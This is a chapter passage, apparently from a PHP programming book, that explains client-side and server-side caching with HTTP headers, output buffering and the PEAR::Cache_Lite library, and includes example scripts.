http://perl.apache.org/docs/general/correct_headers/correct_headers.html
  • 391. Caching 367 visitors will always receive the latest content. In fact, the first header should accom­ plish this on its own; this is the best way to ensure a page is not cached. The Cache- Control and Pragma headers are added for some degree of insurance. Although they don’t work on all browsers or proxies, the Cache-Control and Pragma headers will catch some cases in which the Expires header doesn’t work as intended—if the client computer’s date is set incorrectly, for example. Of course, to disallow caching entirely introduces the problems we discussed at the start of this chapter: it negates the web browser’s natural ability to cache pages, and can create unnecessary overhead, as new versions of pages are always requested, even though those pages may not have been updated since the browser’s last request. We’ll look at the solution to these issues in just a moment. How do I control client-side caching? We addressed the task of disabling client-side caching in “How do I prevent web browsers from caching a page?”, but disabling the cache is rarely the only (or best) option. Here we’ll look at a mechanism that allows us to take advantage of client-side caches in a way that can be controlled from within a PHP script. Apache Required! This approach will only work if you’re running PHP as an Apache web server module, because it requires use of the function getallheaders—which only works with Apache—to fetch the HTTP headers sent by a web browser. Solutions In controlling client-side caching you have two alternatives. You can set a date on which the page will expire, or respond to the browser’s request headers. Let’s see how each of these tactics is executed. Setting a Page Expiry Header The header that’s easiest to implement is the Expires header—we use it to set a date on which the page will expire, and until that time, web browsers are allowed to use a cached version of the page. Here’s an example of this header at work:
  • 392. expires.php (excerpt)

    <?php
    function setExpires($expires)
    {
      header(
        'Expires: '.gmdate('D, d M Y H:i:s', time()+$expires).' GMT');
    }
    setExpires(10);
    echo ( 'This page will self destruct in 10 seconds<br />' );
    echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' );
    echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' );
    ?>

In this example, we created a custom function called setExpires that sets the HTTP Expires header to a point in the future, defined in seconds. The output of the above example shows the current time in GMT, and provides a link that allows us to view the page again. If we follow this link, we’ll notice the time updates only once every ten seconds. If you like, you can also experiment by using your browser’s Refresh button to tell the browser to refresh the cache, and watching what happens to the displayed time.

Acting on the Browser’s Request Headers

A more useful approach to client-side cache control is to make use of the Last-Modified and If-Modified-Since headers, both of which are available in HTTP 1.0. This action is known technically as performing a conditional GET request; whether your script returns any content depends on the value of the incoming If-Modified-Since request header.

If you use PHP version 4.3.0 and above on Apache, the HTTP headers are accessible with the functions apache_request_headers and apache_response_headers. Note that the function getallheaders has become an alias for the new apache_request_headers function.

This approach requires that you send a Last-Modified header every time your PHP script is accessed. The next time the browser requests the page, it sends an If-Modified-Since header containing a time; your script can then identify whether the page has been updated since that time. If it hasn’t, your script sends an HTTP 304 status code to indicate that the page hasn’t been modified, and exits before sending the body of the page.
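Where getallheaders or apache_request_headers isn't available, the same request header can usually be read from the $_SERVER array, where PHP exposes it under the key HTTP_IF_MODIFIED_SINCE. The sketch below takes that route. The function name ifModifiedSinceTimestamp is hypothetical, and the array is passed in as a parameter simply to keep the function easy to test.

```php
<?php
// Hypothetical helper: returns the If-Modified-Since time as a Unix
// timestamp, or 0 when the header is absent or cannot be parsed.
function ifModifiedSinceTimestamp(array $server)
{
    if (empty($server['HTTP_IF_MODIFIED_SINCE'])) {
        return 0;
    }
    // Some older browsers appended an extra field after a semicolon;
    // keep only the date part before it.
    $parts = explode(';', $server['HTTP_IF_MODIFIED_SINCE']);
    $time  = strtotime(trim($parts[0]));
    return ($time === false) ? 0 : $time;
}

// In a real script you would pass $_SERVER itself.
$since = ifModifiedSinceTimestamp($_SERVER);
```

Returning 0 for a missing or unparseable header means the caller can treat "no header" and "bad header" the same way and send a full page.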
  • 393. Let’s see these headers in action. The example below uses the modification date of a text file. To simulate updates, we first need to create a way to randomly write to the file:

ifmodified.php (excerpt)

    <?php
    $file = 'ifmodified.txt';
    $random = array (0,1,1);
    shuffle($random);
    if ( $random[0] == 0 )
    {
      $fp = fopen($file, 'w');
      fwrite($fp, 'x');
      fclose($fp);
    }
    $lastModified = filemtime($file);

Our simple randomizer provides a one-in-three chance that the file will be updated each time the page is requested. We also use the filemtime function to obtain the last modified time of the file.

Next, we send a Last-Modified header that uses the modification time of the text file. We need to send this header for every page we render, to cause visiting browsers to send us the If-Modified-Since header upon every request:

ifmodified.php (excerpt)

    header('Last-Modified: ' .
        gmdate('D, d M Y H:i:s', $lastModified) . ' GMT');

Our use of the getallheaders function ensures that PHP gives us all the incoming request headers as an array. We then need to check that the If-Modified-Since header actually exists; if it does, we have to deal with a special case caused by older Mozilla browsers (earlier than version 6), which appended an illegal extra field to their If-Modified-Since headers. We use PHP’s strtotime function to generate a timestamp from the date the browser sent us. If there’s no such header, we set this timestamp to zero, which forces PHP to give the visitor an up-to-date copy of the page:
  • 394. 370 The PHP Anthology ifmodified.php (excerpt) $request = getallheaders(); if (isset($request['If-Modified-Since'])) { $modifiedSince = explode(';', $request['If-Modified-Since']); $modifiedSince = strtotime($modifiedSince[0]); } else { $modifiedSince = 0; } Finally, we check to see whether or not the cache has been modified since the last time the visitor received this page. If it hasn’t, we simply send a 304 Not Modified response header and exit the script, saving bandwidth and processing time by prompting the browser to display its cached copy of the page: ifmodified.php (excerpt) if ($lastModified <= $modifiedSince) { header('HTTP/1.1 304 Not Modified'); exit(); } echo ( 'The GMT is now '.gmdate('H:i:s').'<br />' ); echo ( '<a href="'.$_SERVER['PHP_SELF'].'">View Again</a><br />' ); ?> Remember to use the “View Again” link when you run this example (clicking the Refresh button usually clears your browser’s cache). If you click on the link re­ peatedly, the cache will eventually be updated; your browser will throw out its cached version and fetch a new page from the server. If you combine the Last-Modified header approach with time values that are already available in your application—for example, the time of the most recent news art­ icle—you should be able to take advantage of web browser caches, saving bandwidth and improving your application’s perceived performance in the process.
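As a rough sketch of that idea, suppose the application already knows the Unix timestamp of its most recent news article. The helper below, whose name and parameters are hypothetical, builds the Last-Modified value and decides whether a 304 response is appropriate. Sending the headers is left to the caller so the logic can be exercised on its own.

```php
<?php
// Hypothetical helper. $contentTime is the Unix timestamp of the newest
// item on the page (for example, the latest news article); $modifiedSince
// is the timestamp parsed from If-Modified-Since, or 0 if none was sent.
function conditionalGet($contentTime, $modifiedSince)
{
    return array(
        // HTTP dates are always expressed in GMT.
        'lastModified' => gmdate('D, d M Y H:i:s', $contentTime) . ' GMT',
        // Only answer 304 when the browser sent a usable date and the
        // content is no newer than the copy it already holds.
        'notModified'  => ($modifiedSince > 0
                           && $contentTime <= $modifiedSince),
    );
}

$latestArticle = 1000000000; // stand-in for a value fetched from the database
$result = conditionalGet($latestArticle, 0);

// A caller would then do something like:
// header('Last-Modified: ' . $result['lastModified']);
// if ($result['notModified']) {
//     header('HTTP/1.1 304 Not Modified');
//     exit();
// }
```

Keeping the decision separate from the header calls also makes it easier to test this logic thoroughly, which matters given how visible a caching mistake is to visitors.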
  • 395. Caching 371 Be very careful to test any caching performed in this manner, though; if you get it wrong, you may cause your visitors to consistently see out-of-date copies of your site. Discussion HTTP dates are always calculated relative to Greenwich Mean Time (GMT). The PHP function gmdate is exactly the same as the date function, except that it auto­ matically offsets the time to GMT based on your server’s system clock and regional settings. When a browser encounters an Expires header, it caches the page. All further re­ quests for the page that are made before the specified expiry time use the cached version of the page—no request is sent to the web server. Of course, client-side caching is only truly effective if the system time on the computer is accurate. If the computer’s time is out of sync with that of the web server, you run the risk of pages either being cached improperly, or never being updated. The Expires header has the advantage that it’s easy to implement; in most cases, however, unless you’re a highly organized person, you won’t know exactly when a given page on your site will be updated. Since the browser will only contact the server after the page has expired, there’s no way to tell browsers that the page they’ve cached is out of date. In addition, you also lose some knowledge of the traffic visiting your web site, since the browser will not make contact with the server when it re­ quests a page that’s been cached. How do I examine HTTP headers in my browser? How can you actually check that your application is running as expected, or debug your code, if you can’t actually see the HTTP headers? It’s worth knowing exactly which headers your script is sending, particularly when you’re dealing with HTTP cache headers. Solution Several worthy tools are available to help you get a closer look at your HTTP headers:
  • 396. LiveHTTPHeaders (http://livehttpheaders.mozdev.org/)
    This add-on to the Firefox browser is a simple but very handy tool for examining request and response headers while you’re browsing.

Firebug (http://getfirebug.org/)
    Another useful Firefox add-on, Firebug is a tool whose interface offers a dedicated tab for examining HTTP request information.

HTTPWatch (http://www.httpwatch.com/)
    This add-on to Internet Explorer for HTTP viewing and debugging is similar to LiveHTTPHeaders above.

Charles Web Debugging Proxy (http://getcharles.com/)
    Available for Windows, Mac OS X, and Linux or Unix, the Charles Web Debugging Proxy is a proxy server that allows developers to see all the HTTP traffic between their browsers and the web servers to which they connect.

Any of these tools will allow you to inspect the communication between the server and browser.

How do I cache file downloads with Internet Explorer?

If you’re developing file download scripts for Internet Explorer users, you might notice a few issues with the download process. In particular, when you’re serving a file download through a PHP script that uses headers such as Content-Disposition: attachment; filename=myFile.pdf or Content-Disposition: inline; filename=myFile.pdf, and that tells the browser not to cache pages, Internet Explorer won’t deliver that file to the user.

Solutions

Internet Explorer handles downloads in a rather unusual manner: it makes two requests to the web site. The first request downloads the file and stores it in the cache before making a second request, the response to which is not stored. The second request invokes the process of delivering the file to the end user in accordance with the file’s type (for instance, it starts Acrobat Reader if the file is a PDF document). Therefore, if you send the cache headers that instruct the browser not to cache the
  • 397. Caching 373 page, Internet Explorer will delete the file between the first and second requests, with the unfortunate result that the end user receives nothing! If the file you’re serving through the PHP script won’t change, one solution to this problem is simply to disable the “don’t cache” headers, pragma and cache-control, which we discussed in “How do I prevent web browsers from caching a page?”, for the download script. If the file download will change regularly, and you want the browser to download an up-to-date version of it, you’ll need to use the Last-Modified header that we met in “How do I control client-side caching?”, and ensure that the time of modific­ ation remains the same across the two consecutive requests. You should be able to achieve this goal without affecting users of browsers that handle downloads correctly. One final solution is to write the file to the file system of your web server and simply provide a link to it, leaving it to the web server to report the cache headers for you. Of course, this may not be a viable option if the file is supposed to be secured. How do I use output buffering for server-side caching? Server-side processing delay is one of the biggest bugbears of dynamic web pages. We can reduce server-side delay by caching output. The page is generated normally, performing database queries and so on with PHP; however, before sending it to the browser, we capture and store the finished page somewhere—in a file, for instance. The next time the page is requested, the PHP script first checks to see whether a cached version of the page exists. If it does, the script sends the cached version straight to the browser, avoiding the delay involved in rebuilding the page. Solution Here, we’ll look at PHP’s in-built caching mechanism, the output buffer, which can be used with whatever page rendering system you prefer (templates or no templates). 
Consider situations in which your script displays results using, for example, echo or print, rather than sending the data directly to the browser. In such cases, you can use PHP’s output control functions to store the data in an in-memory buffer, which your PHP script has both access to and control over.
  • 398. 374 The PHP Anthology Here’s a simple example that demonstrates how the output buffer works: buffer.php (excerpt) <?php ob_start(); echo '1. Place this in the buffer<br />'; $buffer = ob_get_contents(); ob_end_clean(); echo '2. A normal echo<br />'; echo $buffer; ?> The buffer itself stores the output as a string. So, in the above script, we commence buffering with the ob_start function, and use echo to display a piece of text which is stored in the output buffer automatically. We then use the ob_get_contents function to fetch the data the echo statement placed in the buffer, and store it in the $buffer variable. The ob_end_clean function stops the output buffer and empties the contents; the alternative approach is to use the ob_end_flush function, which displays the contents of the buffer. The above script displays the following output: 2. A normal echo 1. Place this in the buffer In other words, we captured the output of the first echo, then sent it to the browser after the second echo. As this simple example suggests, output buffering can be a very powerful tool when it comes to building your site; it provides a solution for caching, as we’ll see in a moment, and is also an excellent way to hide errors from your site’s visitors, as is discussed in Chapter 9. Output buffering even provides a possible alternative to browser redirection in situations such as user authentication. In order to improve the performance of our site, we can store the output buffer contents in a file. We can then call on this file for the next request, rather than having to rebuild the output from scratch again. Let’s look at a quick example of this technique. First, our example script checks for the presence of a cache file:
sscache.php (excerpt)

<?php
if (file_exists('./cache/page.cache'))
{
  readfile('./cache/page.cache');
  exit();
}

If the script finds the cache file, we simply output its contents and we’re done! If the cache file is not found, we proceed to output the page using the output buffer:

sscache.php (excerpt)

ob_start();
?>
<!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <title>Cached Page</title>
  </head>
  <body>
    This page was cached with PHP's
    <a href="http://www.php.net/outcontrol">Output Control Functions</a>
  </body>
</html>
<?php
$buffer = ob_get_contents();
ob_end_flush();

Before we flush the output buffer to display our page, we make sure to store the buffer contents in the $buffer variable. The final step is to store the saved buffer contents in a text file:
sscache.php (excerpt)

$fp = fopen('./cache/page.cache','w');
fwrite($fp,$buffer);
fclose($fp);
?>

The page.cache file contents are exactly the same as the HTML that was rendered by the script:

cache/page.cache (excerpt)

<!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <title>Cached Page</title>
  </head>
  <body>
    This page was cached with PHP's
    <a href="http://www.php.net/outcontrol">Output Control Functions</a>
  </body>
</html>

Discussion

For an example that shows how to use PHP’s output buffering capabilities to handle errors more elegantly, have a look at the PHP Freaks article “Introduction to Output Buffering,” by Derek Ford. [6]

What About Template Caching?

Template engines often include template caching features; Smarty is a case in point. [7] Usually, these engines offer a built-in mechanism for storing a compiled version of a template (that is, the native PHP generated from the template), which saves us developers from having to recompile the template every time a page is requested.

[6] http://www.phpfreaks.com/tutorials/59/0.php
[7] http://smarty.php.net/
This process should not be confused with output (or content) caching, which refers to the caching of the rendered HTML (or other output) that PHP sends to the browser. In addition to the content cache mechanisms discussed in this chapter, Smarty can cache the contents of the HTML page. Whether you use Smarty’s content cache or one of the alternatives discussed in this chapter, you can successfully use both template and content caching together on the same site.

HTTP Headers and Output Buffering

Output buffering can help solve the most common problem associated with the header function, not to mention the issues surrounding session_start and setcookie. Normally, if you call any of these functions after page output has begun, you’ll get a nasty error message. When output buffering’s turned on, the only output types that can escape the buffer are HTTP headers. If you use ob_start at the very beginning of your application’s execution, you can send headers at whichever point you like, without encountering the usual errors. You can then write out the buffered page content all at once, when you’re sure that no more HTTP headers are required.

Use Output Buffering Responsibly

While output buffering can helpfully solve all our header problems, it should not be used solely for that reason. By ensuring that all output is generated after all the headers are sent, you’ll save the time and resource overheads involved in using output buffers.

How do I cache just the parts of a page that change infrequently?

Caching an entire page is a simplistic approach to output buffering. While it’s easy to implement, it fails to take advantage of what PHP’s output control functions really offer: the ability to improve your site’s performance in a manner that’s relevant to the varying lifetimes of your content. No doubt, some parts of the page that you send to visitors will change very rarely, such as the page’s header, menus, and footer.
But other parts—for example, the list of comments on your blog posts—may change quite often. Fortunately, PHP allows you to cache sections of the page separately.
Solution

Output buffering can be used to cache sections of a page in separate files. The page can then be rebuilt for output from these files. This technique eliminates the need to repeat database queries, while loops, and so on. You might consider assigning each block of the page an expiry date after which the cache file is recreated; alternatively, you may build into your application a mechanism that deletes the cache file every time the content it stores is changed.

Let’s work through an example that demonstrates the principle. Firstly, we’ll create two helper functions, writeCache and readCache. Here’s the writeCache function:

smartcache.php (excerpt)

<?php
function writeCache($content, $filename)
{
  $fp = fopen('./cache/' . $filename, 'w');
  fwrite($fp, $content);
  fclose($fp);
}

The writeCache function is quite simple; it just writes the content of the first argument to a file with the name specified in the second argument, and saves that file to a location in the cache directory. We’ll use this function to write our HTML to the cache files.

The readCache function will return the contents of the cache file specified in the first argument if it has not expired; that is, the file’s last modified time is not older than the current time minus the number of seconds specified in the second argument. If it has expired or the file does not exist, the function returns false:

smartcache.php (excerpt)

function readCache($filename, $expiry)
{
  if (file_exists('./cache/' . $filename))
  {
    if ((time() - $expiry) > filemtime('./cache/' . $filename))
    {
      return false;
    }
    $cache = file('./cache/' . $filename);
    return implode('', $cache);
  }
  return false;
}

For the purposes of demonstrating this concept, I’ve used a procedural approach. However, I wouldn’t recommend doing this in practice, as it will result in very messy code and is likely to cause issues with file locking. For example, what happens when someone accesses the cache at the exact moment it’s being updated? Better solutions will be explained later on in the chapter.

Let’s continue this example. After the output buffer is started, processing begins. First, the script calls readCache to see whether the file header.cache exists; this contains the top of the page: the HTML <head> tag and the start <body> tag. We’ve used PHP’s date function to display the time at which the page was actually rendered, so you’ll be able to see the different cache files at work when the page is displayed:

smartcache.php (excerpt)

ob_start();
if (!$header = readCache('header.cache', 604800))
{
?>
<!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <title>Chunked Cached Page</title>
    <meta http-equiv="Content-Type"
        content="text/html; charset=iso-8859-1"/>
  </head>
  <body>
    <p>The header time is now: <?php echo date('H:i:s'); ?></p>
<?php
  $header = ob_get_contents();
  ob_clean();
  writeCache($header,'header.cache');
}

Note what happens when a cache file isn’t found: the header content is output and assigned to a variable, $header, with ob_get_contents, after which the ob_clean function is called to empty the buffer. This allows us to capture the output in “chunks” and assign them to individual cache files with the writeCache function. The header of the page is now stored as a file, which can be reused without our needing to rerender the page.

Look back to the start of the if condition for a moment. When we called readCache, we gave it an expiry time of 604800 seconds (one week); readCache uses the file modification time of the cache file to determine whether the cache is still valid.

For the body of the page, we’ll use the same process as before. However, this time, when we call readCache, we’ll use an expiry time of five seconds; the cache file will be updated whenever it’s more than five seconds old:

smartcache.php (excerpt)

if (!$body = readCache('body.cache', 5))
{
  echo 'The body time is now: ' . date('H:i:s') . '<br />';
  $body = ob_get_contents();
  ob_clean();
  writeCache($body, 'body.cache');
}

The page footer is effectively the same as the header. After the footer, the output buffering is stopped and the contents of the three variables that hold the page data are displayed:

smartcache.php (excerpt)

if (!$footer = readCache('footer.cache', 604800))
{
?>
    <p>The footer time is now: <?php echo date('H:i:s'); ?></p>
  </body>
</html>
<?php
  $footer = ob_get_contents();
  ob_clean();
  writeCache($footer, 'footer.cache');
}
ob_end_clean();
echo $header . $body . $footer;
?>

The end result looks like this:

The header time is now: 17:10:42
The body time is now: 18:07:40
The footer time is now: 17:10:42

The header and footer are updated on a weekly basis, while the body is updated whenever it is more than five seconds old. If you keep refreshing the page, you’ll see the body time updating.

Discussion

Note that if you have a page that builds content dynamically, based on a number of variables, you’ll need to make adjustments to the way you handle your cache files. For example, you might have an online shopping catalog whose listing pages are defined by a URL such as:

http://example.com/catalogue/view.php?category=1&page=2

This URL should show page two of all items in category one; let’s say this is the category for socks. But if we were to use the caching code above, the results of the first page of the first category we looked at would be cached, and shown for any request for any other page or category, until the cache expiry time elapsed. This would certainly confuse the next visitor who wanted to browse the category for shoes, because that person would see the cached content for socks! To avoid this issue, you’ll need to incorporate the category ID and page number into the cache file name like so:
$cache_filename = 'catalogue_' . $category_id . '_' . $page . '.cache';
if (!$catalogue = readCache($cache_filename, 604800))
{
  ⋮ display the category HTML…
}

This way, the correct cached content can be retrieved for every request.

Nesting Buffers

You can nest one buffer within another practically ad infinitum simply by calling ob_start more than once. This can be useful if you have multiple operations that use the output buffer, such as one that catches the PHP error messages, and another that deals with caching. Care needs to be taken to make sure that ob_end_flush or ob_end_clean is called every time ob_start is used.

How do I use PEAR::Cache_Lite for server-side caching?

The previous solution explored the ideas behind output buffering using the PHP ob_* functions. As we mentioned at the time, that approach probably isn’t the best way to meet the dual goals of keeping your code maintainable and having a reliable caching mechanism. It’s time to see how we can put a caching system into action in a manner that will be reliable and easy to maintain.

Solution

In the interests of keeping your code maintainable and having a reliable caching mechanism, it’s a good idea to delegate the responsibility of caching logic to classes you trust. In this case, we’ll use a little help from PEAR::Cache_Lite (version 1.7.2 is used in the examples here). [8] Cache_Lite provides a solid yet easy-to-use library for caching, and handles issues such as: file locking; creating, checking for, and deleting cache files; controlling the output buffer; and directly caching the results from function and class method calls. More to the point, Cache_Lite should be relatively easy to apply to an existing application, requiring only minor code modifications.

[8] http://pear.php.net/package/Cache_Lite/

Cache_Lite has four main classes. First is the base class, Cache_Lite, which deals purely with creating and fetching cache files, but makes no use of output buffering. This class can be used alone for caching operations in which you have no need for output buffering, such as storing the contents of a template you’ve parsed with PHP. The examples here will not use Cache_Lite directly, but will instead focus on the three subclasses. Cache_Lite_Function can be used to call a function or class method and cache the result, which might prove useful for storing a MySQL query result set, for example. The Cache_Lite_Output class uses PHP’s output control functions to catch the output generated by your script and store it in cache files; it allows you to perform tasks such as those we completed in “How do I cache just the parts of a page that change infrequently?”. The Cache_Lite_File class bases cache expiry on the timestamp of a master file, with any cache file being deemed to have expired if it is older than the timestamp.

Let’s work through an example that shows how you might use Cache_Lite to create a simple caching solution. When we’re instantiating any child classes of Cache_Lite, we must first provide an array of options that determine the behavior of Cache_Lite itself. We’ll look at these options in detail in a moment. Note that the cacheDir directory we specify must be one to which the script has read and write access:

cachelite.php (excerpt)

<?php
require_once 'Cache/Lite/Output.php';
$options = array(
  'cacheDir' => './cache/',
  'writeControl' => true,
  'readControl' => true,
  'fileNameProtection' => false,
  'readControlType' => 'md5'
);
$cache = new Cache_Lite_Output($options);

For each chunk of content that we want to cache, we need to set a lifetime (in seconds) for which the cache should live before it’s refreshed.
Next, we use the start method, available only in the Cache_Lite_Output class, to turn on output
buffering. The two arguments passed to the start method are an identifying value for this particular cache file, and a cache group. The group is an identifier that allows a collection of cache files to be acted upon; it’s possible to delete all cache files in a given group, for example (more on this in a moment). The start method will check to see if a valid cache file is available and, if so, it will begin outputting the cache contents. If a cache file is not available, start will return false and begin caching the following output.

Once the output for this chunk has finished, we use the end method to stop buffering and store the content as a file:

cachelite.php (excerpt)

$cache->setLifeTime(604800);
if (!$cache->start('header', 'Static'))
{
?>
<!DOCTYPE html public "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <title>PEAR::Cache_Lite example</title>
    <meta http-equiv="Content-Type"
        content="text/html; charset=iso-8859-1"/>
  </head>
  <body>
    <h2>PEAR::Cache_Lite example</h2>
    <p>The header time is now: <?php echo date('H:i:s'); ?></p>
<?php
  $cache->end();
}

To cache the body and footer, we follow the same procedure we used for the header. Note that, again, we specify a five-second lifetime when caching the body:

cachelite.php (excerpt)

$cache->setLifeTime(5);
if (!$cache->start('body', 'Dynamic'))
{
  echo 'The body time is now: ' . date('H:i:s') . '<br />';
  $cache->end();
}
$cache->setLifeTime(604800);
if (!$cache->start('footer', 'Static'))
{
?>
    <p>The footer time is now: <?php echo date('H:i:s'); ?></p>
  </body>
</html>
<?php
  $cache->end();
}
?>

On viewing the page, Cache_Lite creates cache files in the cache directory. Because we’ve set the fileNameProtection option to false, Cache_Lite creates the files with these names:

■ ./cache/cache_Static_header
■ ./cache/cache_Dynamic_body
■ ./cache/cache_Static_footer

You can read about the fileNameProtection option, and many more, in “What configuration options does Cache_Lite support?”. When the same page is requested later, the code above will use the cached file if it is valid and has not expired.

Protect your Cache Files

Make sure that the directory in which you place the cache files is not publicly available, or you may be offering your site’s visitors access to more than you realize.

What configuration options does Cache_Lite support?

When instantiating Cache_Lite (or any of its subclasses, such as Cache_Lite_Output), you can supply a number of options that control its behavior. These options should be placed in an array and passed to the constructor as shown below (and in the previous section):
$options = array(
  'cacheDir' => './cache/',
  'writeControl' => true,
  'readControl' => true,
  'fileNameProtection' => false,
  'readControlType' => 'md5'
);
$cache = new Cache_Lite_Output($options);

Solution

The options available in the current version of Cache_Lite (1.7.2) are:

cacheDir
  This is the directory in which the cache files will be placed. It defaults to /tmp/.

caching
  This option switches on and off the caching behavior of Cache_Lite. If you have numerous Cache_Lite calls in your code and want to disable the cache for debugging, for example, this option will be important. The default value is true (caching enabled).

lifeTime
  This option represents the default lifetime (in seconds) of cache files. It can be changed using the setLifeTime method. The default value is 3600 (one hour), and if it’s set to null, the cache files will never expire.

fileNameProtection
  With this option activated, Cache_Lite uses an MD5 hash to generate the filename for the cache file. This option protects you from error when you try to use IDs or group names containing characters that aren’t valid for filenames; fileNameProtection must be turned on when you use Cache_Lite_Function. The default is true (enabled).

fileLocking
  This option is used to switch the file locking mechanisms on and off. The default is true (enabled).
writeControl
  This option checks that a cache file has been written correctly immediately after it has been created, and throws a PEAR::Error if it finds a problem. Obviously, this facility would allow your code to attempt to rewrite a cache file that was created incorrectly, but it comes at a cost in terms of performance. The default value is true (enabled).

readControl
  This option checks any cache files that are being read to ensure they’re not corrupt. Cache_Lite is able to place inside the file a value, such as the string length of the file, which can be used to confirm that the cache file isn’t corrupt. There are three alternative mechanisms for checking that a file is valid, and they’re specified using the readControlType option. These mechanisms come at the cost of performance, but should help to guarantee that your visitors aren’t seeing scrambled pages. The default value is true (enabled).

readControlType
  This option lets you specify the type of read control mechanism you want to use. The available mechanisms are a cyclic redundancy check (crc32, the default value) using PHP’s crc32 function, an MD5 hash using PHP’s md5 function (md5), or a simple and fast string length check (strlen). Note that this mechanism is not intended to provide security from people tampering with your cache files; it’s just a way to spot corrupt files.

pearErrorMode
  This option tells Cache_Lite how it should return PEAR errors to the calling script. The default is CACHE_LITE_ERROR_RETURN, which means Cache_Lite will return a PEAR::Error object.

memoryCaching
  With memory caching enabled, every time a file is written to the cache, it is stored in an array in Cache_Lite. The saveMemoryCachingState and getMemoryCachingState methods can be used to store and access the memory cache data between requests.
The advantage of this facility is that the complete set of cache files can be stored in a single file, reducing the number of disk read/write operations by reconstructing the cache files straight into an array to which your code has access. The memoryCaching option may be worth further investigation if you run a large site. The default value is false (disabled).
onlyMemoryCaching
  If this option is enabled, only the memory caching mechanism will be used. The default value is false (disabled).

memoryCachingLimit
  This option places a limit on the number of cache files that will be stored in the memory caching array. The more cache files you have, the more memory will be used up by memory caching, so it may be a good idea to enforce a limit that prevents your server from having to work too hard. Of course, this option places no restriction on the size of each cache file, so just one or two massive files may cause a problem. The default value is 1000.

automaticSerialization
  If enabled, this option will automatically serialize all data types. While this approach will slow down the caching system, it is useful for caching nonscalar data types such as objects and arrays. For higher performance, you might consider serializing nonscalar data types yourself. The default value is false (disabled).

automaticCleaningFactor
  This option will automatically clean old cache entries on average once in every x cache writes, where x is the value set for this option. Therefore, setting this value to 0 will indicate no automatic cleaning, and a value of 1 will cause cache clearing on every cache write. A value of 20 to 200 is the recommended starting point if you wish to enable this facility; it causes cache cleaning to happen, on average, 0.5% to 5% of the time. The default value is 0 (disabled).

hashedDirectoryLevel
  When set to a nonzero value, this option will enable a hashed directory structure. A hashed directory structure will improve the performance of sites that have thousands of cache files. If you choose to use hashed directories, start by setting this value to 1, and increasing it as you test for performance improvements. The default value is 0 (disabled).

errorHandlingAPIBreak
  This option was added to enable backwards compatibility with code that uses the old API.
When the old API was run in CACHE_LITE_ERROR_RETURN mode (see the pearErrorMode option earlier in this list), some functions would return
a Boolean value to indicate success, rather than returning a PEAR_Error object. If you set this value to true, the PEAR_Error object will be returned instead. The default value is false (disabled).

How do I purge the Cache_Lite cache?

The built-in lifetime mechanism for Cache_Lite cache files provides a good foundation for keeping your cache files up to date, but there will be some circumstances in which you need the files to be updated immediately.

Solution

In cases in which you need immediate updates, the methods remove and clean come in handy. The remove method is designed to delete a specific cache file; it takes as arguments the cache ID and group name of the file. To delete the page body cache file we created in “How do I use PEAR::Cache_Lite for server-side caching?”, we’d use this code:

$cache->remove('body', 'Dynamic');

If we use the clean method, we can delete all the files in our cache directory simply by calling the method with no arguments; alternatively, we can specify a group of cache files to delete. If we wanted to delete both the header and footer cache files we created in “How do I use PEAR::Cache_Lite for server-side caching?”, we could do so like this:

$cache->clean('Static');

Discussion

The remove and clean methods should obviously be called in response to events that arise within an application. For example, if you have a discussion forum application, you probably want to remove the relevant cache files when a visitor posts a new message.

Although it may seem like this solution entails a lot of code modifications, with some care it can be applied to your application in a global manner. If you have a central script that’s included in every page, your script can simply watch for incoming events (for example, a variable like $_GET['newPost']) and respond by deleting
the required cache files. This keeps the cache file removal mechanism central and easier to maintain. You might also consider using the php.ini setting auto_prepend_file to include this code in every PHP script.

How do I cache function calls?

Many web sites provide access to their data via web services such as SOAP and XML-RPC. [9] As web services are accessed over a network, it’s often a very good idea to cache results so that they can be fetched locally, rather than repeating the same slow request to the server multiple times. A simple approach might be to use PHP sessions, but as that solution operates on a per-visitor basis, the opening requests for each visitor will still be slow.

Solution

Let’s assume you wish to create a web page that lists all the SitePoint books available on Amazon. The actual list is not likely to change from moment to moment, so why would we make the request to the Amazon web service every time the web page is displayed? We won’t! Instead, we can take advantage of Cache_Lite by caching the results of the web service request.

Requires PEAR::SOAP Version 0.11.0

The following solution uses the PEAR::SOAP library version 0.11.0 to access the Amazon web service. You can find this package on the PEAR web site. [10]

Here’s some hypothetical code that fetches the data from the remote Amazon server:

$results = $amazonClient->ManufacturerSearchRequest($params);

Using Cache_Lite_Function, we can cache the results so the data returned from the service can be reused; this will avoid unnecessary network calls and significantly improve performance.

[9] You can read all about web services in Chapter 12.
[10] http://pear.php.net/package/soap/

The following example code focuses on the caching aspect to prevent us from getting bogged down in the details of using the Amazon web service. You can see the
complete script if you download this book’s code archive from the SitePoint web site.

The Cache_Lite_Function class requires the inclusion of the following file:

cachefunction.php (excerpt)

require_once 'Cache/Lite/Function.php';

We instantiate the Cache_Lite_Function class with some options:

cachefunction.php (excerpt)

$options = array(
  'cacheDir' => './cache/',
  'fileNameProtection' => true,
  'writeControl' => true,
  'readControl' => true,
  'readControlType' => 'strlen',
  'defaultGroup' => 'SOAP'
);
$cache = new Cache_Lite_Function($options);

It’s important that the fileNameProtection option is set to true (this is in fact the default value, but in this case I’ve set it manually to emphasize the point). If it were set to false, the filename would be invalid, so the data would not be cached.

Here’s how we make the calls to our SOAP client class:

cachefunction.php (excerpt)

$results = $cache->call('amazonClient->ManufacturerSearchRequest',
    $params);

If the request is being made for the first time, Cache_Lite_Function will store the results as a serialized array or object in a cache file (not that you need to worry about this), and this file will be used for future requests until it expires. The setLifeTime method can again be used to specify how long the cache files should survive before they’re refreshed; currently, the default value of 3600 seconds (one hour) is being used. You can then use the $results variable exactly as if you were
calling the web service method directly. The output of our example script can be seen in Figure 11.1.

